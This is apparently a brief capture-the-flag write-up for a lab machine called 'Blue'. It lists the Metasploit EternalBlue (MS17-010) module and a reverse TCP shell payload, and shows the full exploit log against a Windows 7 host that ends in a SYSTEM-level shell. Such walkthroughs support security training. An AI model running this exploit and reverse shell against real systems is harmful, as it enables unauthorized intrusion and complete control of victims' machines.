Skip to main content

Blue

METASPLOIT

  • Using: windows/smb/ms17_010_eternalblue
  • PAYLOAD: windows/x64/shell/reverse_tcp
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] 10.10.220.76:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.220.76:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.220.76:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.220.76:445 - The target is vulnerable.
[*] 10.10.220.76:445 - Connecting to target for exploitation.
[+] 10.10.220.76:445 - Connection established for exploitation.
[+] 10.10.220.76:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.220.76:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.220.76:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.220.76:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.220.76:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.220.76:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.220.76:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.220.76:445 - Sending all but last fragment of exploit packet
[*] 10.10.220.76:445 - Starting non-paged pool grooming
[+] 10.10.220.76:445 - Sending SMBv2 buffers
[+] 10.10.220.76:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.220.76:445 - Sending final SMBv2 buffers.
[*] 10.10.220.76:445 - Sending last fragment of exploit packet!
[*] 10.10.220.76:445 - Receiving response from exploit packet
[+] 10.10.220.76:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.220.76:445 - Sending egg to corrupted connection.
[*] 10.10.220.76:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.220.76
[*] Command shell session 1 opened (10.10.20.30:4444 -> 10.10.220.76:49174) at 2022-10-10 04:53:04 +0200
[+] 10.10.220.76:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.220.76:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.220.76:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  • After the Exploit Execution we have System Rights: NT AUTHORITY\SYSTEM
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----

C:\Windows\system32> whoami
NT AUTHORITY\SYSTEM